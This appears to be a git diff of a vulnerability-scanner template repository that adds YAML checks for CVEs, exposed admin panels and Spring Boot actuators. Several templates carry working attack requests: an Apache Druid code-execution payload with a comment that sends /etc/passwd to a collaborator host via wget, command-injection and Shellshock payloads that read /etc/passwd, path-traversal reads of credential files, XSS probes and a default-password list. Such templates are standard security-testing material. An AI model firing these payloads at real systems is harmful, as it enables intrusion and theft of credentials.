Apache Druid is a column-oriented open source distributed data storage written in Java, designed to quickly obtain large amounts of event data and provide low-latency queries on the data.
Apache Druid lacks authorization and authentication by default. Attackers can send specially crafted requests to execute arbitrary code with the privileges of processes on the Druid server.
requests:
- raw:
- |
POST /druid/indexer/v1/sampler?for=example-manifest HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Content-Type: application/json
Content-Length: 1006
Connection: close
{"type":"index","spec":{"type":"index","ioConfig":{"type":"index","inputSource":{"type":"http","uris":["https://druid.apache.org/data/example-manifests.tsv"]},"inputFormat":{"type":"tsv","findColumnsFromHeader":true}},"dataSchema":{"dataSource":"sample","timestampSpec":{"column":"timestamp","missingValue":"2010-01-01T00:00:00Z"},"dimensionsSpec":{},"transformSpec":{"transforms":[],"filter":{"type": "javascript",
"function": "function(value){return java.lang.Runtime.getRuntime().exec('wget example.com')}",
"dimension": "added",
"": {
"enabled": "true"
}
}
}
},"type":"index","tuningConfig":{"type":"index"}},"samplerConfig":{"numRows":50,"timeoutMs":10000}}
# To read system Files, replace (wget example.com) with below payload
# wget --post-file /etc/passwd http://xxxxxxx.burpcollaborator.net
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "application/json"
part: header
condtion: and
- type: regex
regex:
- "numRowsRead"
- "numRowsIndexed"
part: body
condtion: and

30
cves/2021/CVE-2021-3019.yaml Normal file
View File

@ -0,0 +1,30 @@
id: CVE-2021-3019
info:
name: Lanproxy Directory Traversal
author: pikpikcu
severity: medium
# Refrence: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3019
requests:
- method: GET
path:
- "{{BaseURL}}/../conf/config.properties"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "application/octet-stream"
condition: and
part: header
- type: word
words:
- "config.admin.username"
- "config.admin.password"
condition: and
part: body

0
default-logins/ambari/ambari-default-credentials.yaml Executable file → Normal file
View File

35
default-logins/apache/tomcat-manager-default.yaml
View File

@ -8,15 +8,40 @@ requests:
- payloads:
username:
- tomcat
- admin
- ovwebusr
- j2deployer
- cxsdk
- ADMIN
- xampp
- tomcat
- QCC
- admin
- root
- role1
- role
- tomcat
- admin
- role1
password:
- tomcat
- admin
- guest
- password
- test
- 12345
- 123456
- OvW*busr1
- j2deployer
- kdsxc
- ADMIN
- xampp
- s3cret
- QLogic66
- tomcat
- root
- role1
- changethis
- changethis
- j5Brn9
- tomcat
attack: clusterbomb # Available options: sniper, pitchfork and clusterbomb

0
default-logins/ofbiz/ofbiz-default-credentials.yaml Executable file → Normal file
View File

0
default-logins/zabbix/zabbix-default-credentials.yaml Executable file → Normal file
View File

0
exposed-panels/active-admin-exposure.yaml Executable file → Normal file
View File

0
exposed-panels/activemq-panel.yaml Executable file → Normal file
View File

0
exposed-panels/airflow-exposure.yaml Executable file → Normal file
View File

0
exposed-panels/couchdb-exposure.yaml Executable file → Normal file
View File

0
exposed-panels/couchdb-fauxton.yaml Executable file → Normal file
View File

0
exposed-panels/druid-console-exposure.yaml Executable file → Normal file
View File

0
exposed-panels/exposed-pagespeed-global-admin.yaml Executable file → Normal file
View File

0
exposed-panels/flink-exposure.yaml Executable file → Normal file
View File

0
exposed-panels/hadoop-exposure.yaml Executable file → Normal file
View File

0
exposed-panels/kafka-connect-ui.yaml Executable file → Normal file
View File

0
exposed-panels/kafka-monitoring.yaml Executable file → Normal file
View File

0
exposed-panels/kafka-topics-ui.yaml Executable file → Normal file
View File

17
exposed-panels/key-cloak-admin-panel.yaml Normal file
View File

@ -0,0 +1,17 @@
id: key-cloak-admin-panel
info:
name: Keycloak Admin Panel
author: incogbyte
severity: low
requests:
- method: GET
path:
- "{{BaseURL}}/auth/admin/master/console/"
matchers:
- type: word
words:
- "<a href=\"http://www.keycloak.org\">"
part: body

1
exposed-panels/public-tomcat-manager.yaml
View File

@ -9,6 +9,7 @@ requests:
- method: GET
path:
- '{{BaseURL}}/manager/html'
- '{{BaseURL}}/host-manager/html'
matchers-condition: and
matchers:

0
exposed-panels/rocketmq-console-exposure.yaml Executable file → Normal file
View File

0
exposed-panels/selenoid-ui-exposure.yaml Executable file → Normal file
View File

0
exposed-panels/setup-page-exposure.yaml Executable file → Normal file
View File

0
exposed-panels/solr-exposure.yaml Executable file → Normal file
View File

3
exposed-panels/sonarqube-login.yaml
View File

@ -9,9 +9,6 @@ requests:
- method: GET
path:
- "{{BaseURL}}/sessions/new"
- "{{BaseURL}}:9000/sessions/new"
- "{{BaseURL}}:8080/sessions/new"
- "{{BaseURL}}:9090/sessions/new"
matchers:
- type: word

1
exposed-panels/tomcat-manager-pathnormalization.yaml
View File

@ -8,6 +8,7 @@ requests:
- method: GET
path:
- '{{BaseURL}}/..;/manager/html'
- '{{BaseURL}}/..;/host-manager/html'
headers:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
matchers:

0
exposed-panels/yarn-manager-exposure.yaml Executable file → Normal file
View File

0
exposed-panels/zipkin-exposure.yaml Executable file → Normal file
View File

0
exposed-tokens/aws/amazon-mws-auth-token-value.yaml Executable file → Normal file
View File

0
exposed-tokens/aws/aws-access-key-value.yaml Executable file → Normal file
View File

0
exposed-tokens/google/google-api-key.yaml Executable file → Normal file
View File

0
exposed-tokens/mailchimp/mailchimp-api-key.yaml Executable file → Normal file
View File

0
exposures/configs/airflow-configuration-exposure.yaml Executable file → Normal file
View File

34
exposures/configs/alibaba-canal-info-leak.yaml Normal file
View File

@ -0,0 +1,34 @@
id: alibaba-canal-info-leak
info:
name: Alibaba Canal Info Leak
author: pikpikcu
severity: info
# https://github.com/alibaba/canal/issues/632
# https://netty.io/wiki/reference-counted-objects.html
# https://my.oschina.net/u/4581879/blog/4753320
requests:
- method: GET
path:
- "{{BaseURL}}/api/v1/canal/config/1/1"
headers:
Content-Type: application/json
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "application/json"
condition: and
part: header
- type: word
words:
- "ncanal.aliyun.accessKey"
- "ncanal.aliyun.secretKey"
condition: and
part: body

0
exposures/configs/amazon-docker-config-disclosure.yaml Executable file → Normal file
View File

0
exposures/configs/ansible-config-disclosure.yaml Executable file → Normal file
View File

28
exposures/configs/gmail-api-client-secrets.yaml Normal file
View File

@ -0,0 +1,28 @@
id: gmail-api-client-secrets
info:
name: GMail API client_secrets.json
author: geeknik
severity: info
description: https://developers.google.com/gmail/api/auth/web-server
requests:
- method: GET
path:
- "{{BaseURL}}/client_secrets.json"
matchers-condition: and
matchers:
- type: word
words:
- "client_id"
- "auth_uri"
- "token_uri"
condition: and
- type: status
status:
- 200
- type: word
part: header
words:
- "application/json"

0
exposures/configs/perl-status.yaml Executable file → Normal file
View File

0
exposures/configs/symfony-database-config.yaml Executable file → Normal file
View File

35
fuzzing/wp-plugin-scan.yaml
View File

@ -1,35 +0,0 @@
id: wp-plugin-scan
info:
name: Wordpress Plugin Scanner
author: pdteam
severity: info
description: wordlist based wordpress plugin scanner.
requests:
- payloads:
plugin_wordlist: helpers/wordlists/wp-plugins.txt
# Thanks to RandomRobbieBF for the wordlist
# https://github.com/RandomRobbieBF/wordpress-plugin-list
attack: sniper
threads: 50
raw:
- |
GET /§plugin_wordlist§ HTTP/1.1
Host: {{Hostname}}
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Referer: {{BaseURL}}
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "== Description =="

57709
helpers/wordlists/wp-plugins.txt
View File

File diff suppressed because it is too large Load Diff

16
miscellaneous/basic-cors-flash.yaml
View File

@ -1,16 +0,0 @@
id: basic-cors-misconfig-flash
info:
name: Basic CORS misconfiguration exploitable with Flash
author: nadino
severity: info
requests:
- method: GET
path:
- "{{BaseURL}}/crossdomain.xml"
matchers:
- type: word
words:
- 'allow-access-from domain="*"'
part: body

0
misconfiguration/airflow-api-exposure.yaml Executable file → Normal file
View File

2
misconfiguration/docker-api.yaml → misconfiguration/exposed-docker-api.yaml
View File

@ -9,9 +9,7 @@ requests:
- method: GET
path:
- "http://{{Hostname}}/version"
- "http://{{Hostname}}:2376/version"
- "http://{{Hostname}}/v1.24/version"
- "http://{{Hostname}}:2376/v1.24/version"
matchers-condition: and
matchers:

0
exposures/logs/nginx-status.yaml → misconfiguration/nginx-status.yaml
View File

24
misconfiguration/php-fpm-status.yaml Normal file
View File

@ -0,0 +1,24 @@
id: php-fpm-status
info:
name: PHP-FPM Status
author: geeknik
severity: info
requests:
- method: GET
path:
- "{{BaseURL}}/status?full"
matchers-condition: and
matchers:
- type: word
words:
- 'pool:'
- 'process manager:'
- 'start time:'
- 'pid:'
condition: and
- type: status
status:
- 200

2
misconfiguration/salesforce-aura-misconfig.yaml
View File

@ -3,7 +3,7 @@ id: salesforce-aura-misconfig
info:
name: Detect the exposure of Salesforce Lightning aura API
author: aaron_costello (@ConspiracyProof)
severity: medium
severity: info
# Reference:-
# https://www.enumerated.de/index/salesforce

0
exposures/configs/server-status-localhost.yaml → misconfiguration/server-status-localhost.yaml
View File

97
misconfiguration/springboot-detect.yaml
View File

@ -1,97 +0,0 @@
id: springboot-actuators
info:
name: Detect the exposure of Springboot Actuators
author: that_juan_ & dwisiswant0
severity: medium
requests:
- method: GET
path:
- "{{BaseURL}}/actuator"
- "{{BaseURL}}/actuator/auditevents"
- "{{BaseURL}}/actuator/auditLog"
- "{{BaseURL}}/actuator/beans"
- "{{BaseURL}}/actuator/caches"
- "{{BaseURL}}/actuator/conditions"
- "{{BaseURL}}/actuator/configprops"
- "{{BaseURL}}/actuator/configurationMetadata"
- "{{BaseURL}}/actuator/dump"
- "{{BaseURL}}/actuator/env"
- "{{BaseURL}}/actuator/events"
- "{{BaseURL}}/actuator/exportRegisteredServices"
- "{{BaseURL}}/actuator/features"
- "{{BaseURL}}/actuator/flyway"
- "{{BaseURL}}/actuator/healthcheck"
- "{{BaseURL}}/actuator/heapdump"
- "{{BaseURL}}/actuator/httptrace"
- "{{BaseURL}}/actuator/hystrix.stream"
- "{{BaseURL}}/actuator/integrationgraph"
- "{{BaseURL}}/actuator/jolokia"
- "{{BaseURL}}/actuator/liquibase"
- "{{BaseURL}}/actuator/logfile"
- "{{BaseURL}}/actuator/loggers"
- "{{BaseURL}}/actuator/loggingConfig"
- "{{BaseURL}}/actuator/management"
- "{{BaseURL}}/actuator/mappings"
- "{{BaseURL}}/actuator/metrics"
- "{{BaseURL}}/actuator/refresh"
- "{{BaseURL}}/actuator/registeredServices"
- "{{BaseURL}}/actuator/releaseAttributes"
- "{{BaseURL}}/actuator/resolveAttributes"
- "{{BaseURL}}/actuator/scheduledtasks"
- "{{BaseURL}}/actuator/sessions"
- "{{BaseURL}}/actuator/shutdown"
- "{{BaseURL}}/actuator/springWebflow"
- "{{BaseURL}}/actuator/sso"
- "{{BaseURL}}/actuator/ssoSessions"
- "{{BaseURL}}/actuator/statistics"
- "{{BaseURL}}/actuator/status"
- "{{BaseURL}}/actuator/threaddump"
- "{{BaseURL}}/actuator/trace"
- "{{BaseURL}}/auditevents"
- "{{BaseURL}}/autoconfig"
- "{{BaseURL}}/beans"
- "{{BaseURL}}/cloudfoundryapplication"
- "{{BaseURL}}/configprops"
- "{{BaseURL}}/dump"
- "{{BaseURL}}/env"
- "{{BaseURL}}/heapdump"
- "{{BaseURL}}/hystrix.stream"
- "{{BaseURL}}/jolokia"
- "{{BaseURL}}/jolokia/list"
- "{{BaseURL}}/loggers"
- "{{BaseURL}}/management"
- "{{BaseURL}}/mappings"
- "{{BaseURL}}/metrics"
- "{{BaseURL}}/threaddump"
- "{{BaseURL}}/trace"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "method"
- "spring"
- "TYPE"
- "system"
- "database"
- "cron"
- "reloadByURL"
- "JMXConfigurator"
- "JMImplementation"
- "EnvironmentManager"
- "org.springframework.boot.loader"
- "health"
condition: or
- type: status
status:
- 200
- type: word
words:
- "X-Application-Context"
- "application/json"
- "application/vnd.spring-boot.actuator"
- "hprof"
condition: or
part: header

32
misconfiguration/springboot/springboot-configprops.yaml Normal file
View File

@ -0,0 +1,32 @@
id: springboot-configprops
info:
name: Detect Springboot Configprops Actuator
author: that_juan_ & dwisiswant0 & wdahlenb
severity: low
description: Sensitive environment variables may not be masked
requests:
- method: GET
path:
- "{{BaseURL}}/configprops"
- "{{BaseURL}}/actuator/configprops"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "org.springframework.boot.actuate"
- "beans"
- "contexts"
condition: and
- type: status
status:
- 200
- type: word
words:
- "application/json"
- "application/vnd.spring-boot.actuator"
- "application/vnd.spring-boot.actuator.v1+json"
condition: or
part: header

33
misconfiguration/springboot/springboot-env.yaml Normal file
View File

@ -0,0 +1,33 @@
id: springboot-env
info:
name: Detect Springboot Env Actuator
author: that_juan_ & dwisiswant0 & wdahlenb
severity: high
description: Sensitive environment variables may not be masked
requests:
- method: GET
path:
- "{{BaseURL}}/env"
- "{{BaseURL}}/actuator/env"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "JAVA_HOME"
- "sping.config.location"
- "spring.application.name"
- "local.server.port"
condition: or
- type: status
status:
- 200
- type: word
words:
- "application/json"
- "application/vnd.spring-boot.actuator"
- "application/vnd.spring-boot.actuator.v1+json"
condition: or
part: header

38
misconfiguration/springboot/springboot-heapdump.yaml Normal file
View File

@ -0,0 +1,38 @@
id: springboot-heapdump
info:
name: Detect Springboot Heapdump Actuator
author: that_juan_ & dwisiswant0 & wdahlenb
severity: critical
description: Environment variables and HTTP requests can be found in the HPROF
requests:
- method: GET
path:
- "{{BaseURL}}/heapdump"
- "{{BaseURL}}/actuator/heapdump"
matchers-condition: and
matchers:
- type: binary
part: body
binary:
- "4a4156412050524f46494c45" # "JAVA PROFILE"
- "4850524f46" # "HPROF"
- "1f8b080000000000" # Gunzip magic byte
condition: or
- type: status
status:
- 200
- type: word
words:
- "application/octet-stream"
- "application/vnd.spring-boot.actuator"
- "application/vnd.spring-boot.actuator.v1+json"
condition: or
part: header
- type: dsl
dsl:
- "len(body) >= 100000"
- "content_length >= 100000"
condition: or
part: header

33
misconfiguration/springboot/springboot-loggers.yaml Normal file
View File

@ -0,0 +1,33 @@
id: springboot-loggers
info:
name: Detect Springboot Loggers
author: that_juan_ & dwisiswant0 & wdahlenb
severity: low
requests:
- method: GET
path:
- "{{BaseURL}}/loggers"
- "{{BaseURL}}/actuator/loggers"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"loggers"'
- '"profiles":'
condition: or
- type: status
status:
- 200
- type: word
words:
- "application/json"
- "application/vnd.spring-boot.actuator"
- "application/vnd.spring-boot.actuator.v1+json"
condition: or
part: header

32
misconfiguration/springboot/springboot-mappings.yaml Normal file
View File

@ -0,0 +1,32 @@
id: springboot-mappings
info:
name: Detect Springboot Mappings Actuator
author: that_juan_ & dwisiswant0 & wdahlenb
severity: low
description: Additional routes may be displayed
requests:
- method: GET
path:
- "{{BaseURL}}/mappings"
- "{{BaseURL}}/actuator/mappings"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "mappings"
- "method"
- "produces"
condition: and
- type: status
status:
- 200
- type: word
words:
- "application/json"
- "application/vnd.spring-boot.actuator"
- "application/vnd.spring-boot.actuator.v1+json"
condition: or
part: header

35
misconfiguration/springboot/springboot-trace.yaml Normal file
View File

@ -0,0 +1,35 @@
id: springboot-trace
info:
name: Detect Springboot Trace Actuator
author: that_juan_ & dwisiswant0 & wdahlenb
severity: low
description: View recent HTTP requests and responses
requests:
- method: GET
path:
- "{{BaseURL}}/trace"
- "{{BaseURL}}/actuator/trace"
- "{{BaseURL}}/httptrace"
- "{{BaseURL}}/actuator/httptrace"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "traces"
- "response"
- "request"
- "principal"
condition: or
- type: status
status:
- 200
- type: word
words:
- "application/json"
- "application/vnd.spring-boot.actuator"
- "application/vnd.spring-boot.actuator.v1+json"
condition: or
part: header

20
technologies/detect-springboot-actuator.yaml Normal file
View File

@ -0,0 +1,20 @@
id: detect-springboot-actuator
info:
name: Detect Springboot Actuators
author: that_juan_ & dwisiswant0 & wdahlenb
severity: info
requests:
- method: GET
path:
- "{{BaseURL}}/actuator"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '{"_links":{"self"'
- type: status
status:
- 200

25
technologies/selea-ip-camera.yaml Normal file
View File

@ -0,0 +1,25 @@
id: selea-ip-camera
info:
name: Detect Selea Targa IP OCR-ANPR Camera
author: geeknik
description: Selea Targa IP OCR-ANPR Camera Unauthenticated RTP/RTSP/M-JPEG Stream Disclosure -- https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5619.php
severity: info
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: word
part: header
words:
- "SeleaCPSHttpServer"
- type: word
part: body
words:
- "Selea CarPlateServer"
- type: status
status:
- 200

28
vulnerabilities/other/CNVD-2020-62422.yaml Normal file
View File

@ -0,0 +1,28 @@
id: CNVD-2020-62422
info:
name: Seeyon readfile(CNVD-2020-62422)
author: pikpikcu
severity: medium
reference: https://blog.csdn.net/m0_46257936/article/details/113150699
requests:
- method: GET
path:
- "{{BaseURL}}/seeyon/webmail.do?method=doDownloadAtt&filename=index.jsp&filePath=../conf/datasourceCtp.properties"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "application/x-msdownload"
condition: and
part: header
- type: word
words:
- "ctpDataSource.password"
condition: and
part: body

0
vulnerabilities/other/acme-xss.yaml Executable file → Normal file
View File

0
vulnerabilities/other/bullwark-momentum-series-directory-traversal.yaml → vulnerabilities/other/bullwark-momentum-lfi.yaml
View File

27
vulnerabilities/other/chamilo-lms-xss.yaml Normal file
View File

@ -0,0 +1,27 @@
id: chamilo-lms-xss
info:
name: Chamilo LMS Cross Site Scripting
author: geeknik
severity: medium
description: https://www.netsparker.com/web-applications-advisories/ns-21-001-cross-site-scripting-in-chamilo-lms/
requests:
- method: GET
path:
- '{{BaseURL}}/chamilo/main/calendar/agenda_list.php?type=x"%20onmouseover=xss(0x01CE61)%20x="#collapse-personal_1'
- '{{BaseURL}}/main/calendar/agenda_list.php?type=x"%20onmouseover=xss(0x01CE61)%20x="#collapse-personal_1'
matchers-condition: and
matchers:
- type: word
part: body
words:
- "onmouseover%3dxss(0x01CE61)"
- type: status
status:
- 200
- type: word
part: header
words:
- "text/html"

28
vulnerabilities/other/dlink-850L-info-leak.yaml Normal file
View File

@ -0,0 +1,28 @@
id: dlink-850L-info-leak
info:
name: Dlink Dir-850L Info Leak
author: pikpikcu
severity: info
reference: https://xz.aliyun.com/t/2941
requests:
- method: POST
path:
- "{{BaseURL}}/hedwig.cgi"
body: |
<?xml version="1.0" encoding="utf-8"?><postxml><module><service>../../../htdocs/webinc/getcfg/DEVICE.ACCOUNT.xml</service></module></postxml>
headers:
Cookie: uid=R8tBjwtFc8
Content-Type: text/xml
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "</usrid>"
- "</password>"
part: body

29
vulnerabilities/other/keycloak-xss.yaml Normal file
View File

@ -0,0 +1,29 @@
id: keycloak-xss
info:
name: Keycloak <= 8.0 - Cross Site Scripting
author: incogbyte
severity: medium
reference: https://cure53.de/pentest-report_keycloak.pdf
requests:
- raw:
- |
POST /auth/realms/master/clients-registrations/openid-connect HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Content-Type: application/x-www-form-urlencoded
{"<img onerror=confirm(1337) src/>":1}
matchers-condition: and
matchers:
- type: status
status:
- 400
- type: word
words:
- 'Unrecognized field "<img onerror=confirm(1337) src/>"'

26
vulnerabilities/other/sangfor-edr-rce.yaml Normal file
View File

@ -0,0 +1,26 @@
id: sangfor-edr-rce
info:
name: Sangfor EDR 3.2.17R1/3.2.21 RCE
author: pikpikcu
severity: critical
reference: https://www.cnblogs.com/0day-li/p/13650452.html
requests:
- method: POST
path:
- "{{BaseURL}}/api/edr/sangforinter/v2/cssp/slog_client?token=eyJtZDUiOnRydWV9"
headers:
Content-Type: application/x-www-form-urlencoded
body: |
{"params":"w=123\"'1234123'\"|cat /etc/passwd"}
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
part: body
- type: status
status:
- 200

29
vulnerabilities/other/sonicwall-sslvpn-shellshock.yaml Normal file
View File

@ -0,0 +1,29 @@
id: sonicwall-sslvpn-shellshock
info:
name: Sonicwall SSLVPN ShellShock RCE
author: PR3R00T
severity: critical
reference: |
- https://twitter.com/chybeta/status/1353974652540882944
- https://darrenmartyn.ie/2021/01/24/visualdoor-sonicwall-ssl-vpn-exploit/
requests:
- raw:
- |
GET /cgi-bin/jarrewrite.sh HTTP/1.1
Host: {{Hostname}}
User-Agent: "() { :; }; echo ; /bin/bash -c 'cat /etc/passwd'"
Accept: */*
Accept-Language: en
Connection: close
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
part: body
- type: status
status:
- 200

28
vulnerabilities/other/wooyun-path-traversal.yaml Normal file
View File

@ -0,0 +1,28 @@
id: wooyun-path-traversal
info:
name: Wooyun Path Traversal
author: pikpikcu
severity: high
reference: https://wooyun.x10sec.org/static/bugs/wooyun-2015-0148227.html
description: |
A general document of UFIDA ERP-NC contains a vulnerability
(affecting a large number of well-known school government and enterprise cases
such as COFCO/Minsheng E-commerce/Tsinghua University/Aigo)
requests:
- method: GET
path:
- "{{BaseURL}}/NCFindWeb?service=IPreAlertConfigService&filename=../../ierp/bin/prop.xml"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- <DataSourceClassName>
- </DataSourceClassName>
part: body
condition: and

0
vulnerabilities/other/yarn-resourcemanager-rce.yaml Executable file → Normal file
View File

0
vulnerabilities/thinkphp/thinkphp-2-rce.yaml Executable file → Normal file
View File

0
vulnerabilities/thinkphp/thinkphp-5022-rce.yaml Executable file → Normal file
View File

0
vulnerabilities/thinkphp/thinkphp-5023-rce.yaml Executable file → Normal file
View File

0
vulnerabilities/thinkphp/thinkphp-509-information-disclosure.yaml Executable file → Normal file
View File

24
vulnerabilities/wordpress/wp-enabled-registration.yaml Normal file
View File

@ -0,0 +1,24 @@
id: wp-enabled-registration
info:
name: WordPress user registration enabled
author: Ratnadip Gajbhiye
severity: info
requests:
- method: GET
path:
- '{{BaseURL}}/wp-login.php?action=register'
matchers-condition: and
matchers:
- type: word
words:
- Register For This Site
- E-mail
condtion: and
part: body
- type: status
status:
- 200

6
miscellaneous/wp-xmlrpc.yaml → vulnerabilities/wordpress/wp-xmlrpc.yaml
View File

@ -10,6 +10,6 @@ requests:
path:
- "{{BaseURL}}/xmlrpc.php"
matchers:
- type: status
status:
- 405
- type: word
words:
- 'XML-RPC server accepts POST requests only.'

6
workflows/jira-workflow.yaml
View File

@ -23,4 +23,8 @@ workflows:
- template: cves/2019/CVE-2019-11581.yaml
- template: cves/2020/CVE-2020-14179.yaml
- template: cves/2020/CVE-2020-14181.yaml
- template: vulnerabilities/jira/
- template: vulnerabilities/jira/jira-service-desk-signup.yaml
- template: vulnerabilities/jira/jira-unauthenticated-dashboards.yaml
- template: vulnerabilities/jira/jira-unauthenticated-popular-filters.yaml
- template: vulnerabilities/jira/jira-unauthenticated-projects.yaml
- template: vulnerabilities/jira/jira-unauthenticated-user-picker.yaml

13
workflows/springboot-workflow.yaml
View File

@ -10,9 +10,16 @@ info:
workflows:
- template: misconfiguration/springboot-detect.yaml
- template: technologies/detect-springboot-actuator.yaml
subtemplates:
- template: misconfiguration/springboot/springboot-configprops.yaml
- template: misconfiguration/springboot/springboot-env.yaml
- template: misconfiguration/springboot/springboot-heapdump.yaml
- template: misconfiguration/springboot/springboot-loggers.yaml
- template: misconfiguration/springboot/springboot-mappings.yaml
- template: misconfiguration/springboot/springboot-trace.yaml
- template: vulnerabilities/springboot/springboot-actuators-jolokia-xxe.yaml
- template: vulnerabilities/springboot/springboot-h2-db-rce.yaml
- template: cves/2018/CVE-2018-1271.yaml
- template: cves/2018/CVE-2018-1271.yaml
- template: cves/2020/CVE-2020-5410.yaml
- template: vulnerabilities/springboot/
- template: cves/2020/CVE-2020-5410.yaml

5
workflows/thinkphp-workflow.yaml
View File

@ -10,4 +10,7 @@ workflows:
matchers:
- name: thinkphp
subtemplates:
- template: vulnerabilities/thinkphp/
- template: vulnerabilities/thinkphp/thinkphp-2-rce.yaml
- template: vulnerabilities/thinkphp/thinkphp-5022-rce.yaml
- template: vulnerabilities/thinkphp/thinkphp-5023-rce.yaml
- template: vulnerabilities/thinkphp/thinkphp-509-information-disclosure.yaml

18
workflows/wordpress-workflow.yaml
View File

@ -16,4 +16,20 @@ workflows:
- template: cves/2019/CVE-2019-15858.yaml
- template: cves/2019/CVE-2019-6715.yaml
- template: cves/2019/CVE-2019-9978.yaml
- template: vulnerabilities/wordpress/
- template: vulnerabilities/wordpress/easy-wp-smtp-listing.yaml
- template: vulnerabilities/wordpress/sassy-social-share.yaml
- template: vulnerabilities/wordpress/w3c-total-cache-ssrf.yaml
- template: vulnerabilities/wordpress/wordpress-accessible-wpconfig.yaml
- template: vulnerabilities/wordpress/wordpress-db-backup.yaml
- template: vulnerabilities/wordpress/wordpress-debug-log.yaml
- template: vulnerabilities/wordpress/wordpress-directory-listing.yaml
- template: vulnerabilities/wordpress/wordpress-emails-verification-for-woocommerce.yaml
- template: vulnerabilities/wordpress/wordpress-emergency-script.yaml
- template: vulnerabilities/wordpress/wordpress-installer-log.yaml
- template: vulnerabilities/wordpress/wordpress-social-metrics-tracker.yaml
- template: vulnerabilities/wordpress/wordpress-tmm-db-migrate.yaml
- template: vulnerabilities/wordpress/wordpress-user-enumeration.yaml
- template: vulnerabilities/wordpress/wordpress-wordfence-xss.yaml
- template: vulnerabilities/wordpress/wordpress-wpcourses-info-disclosure.yaml
- template: vulnerabilities/wordpress/wp-enabled-registration.yaml
- template: vulnerabilities/wordpress/wp-xmlrpc.yaml